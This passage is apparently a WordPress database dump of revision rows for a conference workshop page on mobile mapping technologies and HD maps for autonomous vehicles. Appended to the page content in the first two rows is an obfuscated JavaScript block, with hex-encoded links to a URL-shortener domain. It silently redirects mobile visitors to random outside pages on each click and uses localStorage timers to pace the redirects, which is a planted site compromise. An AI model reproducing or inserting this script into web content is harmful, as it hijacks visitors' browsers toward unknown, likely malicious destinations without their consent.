_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','MMT and HD Maps - Mobile Mapping Technologies and HD Maps','','inherit','closed','closed','','2095-revision-v1','','','2022-10-07 19:34:49','2022-10-07 19:34:49','',2095,'https://gsw2023.com/?p=2558',0,'revision','',0),
(2559,1,'2022-10-07 19:40:24','2022-10-07 19:40:24','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2553\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"0\"]\r\n<h5 style=\"text-align: justify; color: black;\">Autonomous driving vehicles, or self-driving cars, have made enormous progress in recent years. With advances in computing and sensor technologies, onboard systems can deal with a large amount of data and achieve real-time process continuously and accurately. These systems also handle several specialized functional schemes such as positioning, mapping, perception, motion planning and control. These key components are essential for the vehicle to achieve fully autonomous operation. In addition, HD maps provide detailed map information for navigating autonomous vehicles to ensure the navigation safety to protect human lives. The map itself serves as an additional “pseudo sensor” of the car and it signiﬁcantly enhances the performance and accuracy of perception and positioning algorithms, which are necessary for the vehicle to drive autonomously. In addition, HD maps and real time accurate positioning enable a number of services and applications, supporting the realization of smart cities.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">This workshop will cover relevant topics and trends in mobile mapping and high definition maps for intelligent transportation and smart city applications, and also introduce the new tendencies of this new paradigm in geospatial science.</h5>\r\n[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: left; color: red;\"><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Static HD maps automated production and update</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Dynamic HD maps automated production and update</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Conventional and crowd sourcing mapping platforms for HD maps production </strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>3rd party certified low-cost multi-sensor mapping systems for ITS applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Autonomous vehicle navigation with HD point cloud maps</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Autonomous vehicle navigation with HD vector maps</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>HD maps applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Formats, standards and field practice guidelines </strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Georeferenced 3D spatial information processing for smart road applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Georeferenced 3D spatial information manipulation for connected vehicles</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multi-sensor calibration</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Sensor cluster design and platform developments</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multi-sensor fusion for seamless mapping and navigation applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Simultaneous localization and mapping with LiDAR or cameras</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Point cloud processing</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Deep learning for 3D spatial information processing</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Feature extraction from georeferenced images and point cloud</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multi-sensor system assessment and quality validation</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>GNSS denied and challenging environments validation</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Novel application cases</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','MMT and HD Maps - Mobile Mapping Technologies and HD Maps','','inherit','closed','closed','','2095-revision-v1','','','2022-10-07 19:40:24','2022-10-07 19:40:24','',2095,'https://gsw2023.com/?p=2559',0,'revision','',0),
(2560,1,'2022-10-07 19:43:21','2022-10-07 19:43:21','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2553\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"0\"]\r\n<h5 style=\"text-align: justify; color: black;\">Autonomous driving vehicles, or self-driving cars, have made enormous progress in recent years. With advances in computing and sensor technologies, onboard systems can deal with a large amount of data and achieve real-time process continuously and accurately. These systems also handle several specialized functional schemes such as positioning, mapping, perception, motion planning and control. These key components are essential for the vehicle to achieve fully autonomous operation. In addition, HD maps provide detailed map information for navigating autonomous vehicles to ensure the navigation safety to protect human lives. The map itself serves as an additional “pseudo sensor” of the car and it signiﬁcantly enhances the performance and accuracy of perception and positioning algorithms, which are necessary for the vehicle to drive autonomously. In addition, HD maps and real time accurate positioning enable a number of services and applications, supporting the realization of smart cities.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">This workshop will cover relevant topics and trends in mobile mapping and high definition maps for intelligent transportation and smart city applications, and also introduce the new tendencies of this new paradigm in geospatial science.</h5>\r\n[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][bsf-info-box icon_size=\"32\"]\r\n<h5 style=\"text-align: left; color: red;\"><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Static HD maps automated production and update</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Dynamic HD maps automated production and update</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Conventional and crowd sourcing mapping platforms for HD maps production </strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>3rd party certified low-cost multi-sensor mapping systems for ITS applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Autonomous vehicle navigation with HD point cloud maps</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Autonomous vehicle navigation with HD vector maps</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>HD maps applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Formats, standards and field practice guidelines </strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Georeferenced 3D spatial information processing for smart road applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Georeferenced 3D spatial information manipulation for connected vehicles</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multi-sensor calibration</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Sensor cluster design and platform developments</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Multi-sensor fusion for seamless mapping and navigation applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Simultaneous localization and mapping with LiDAR or cameras</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Point cloud 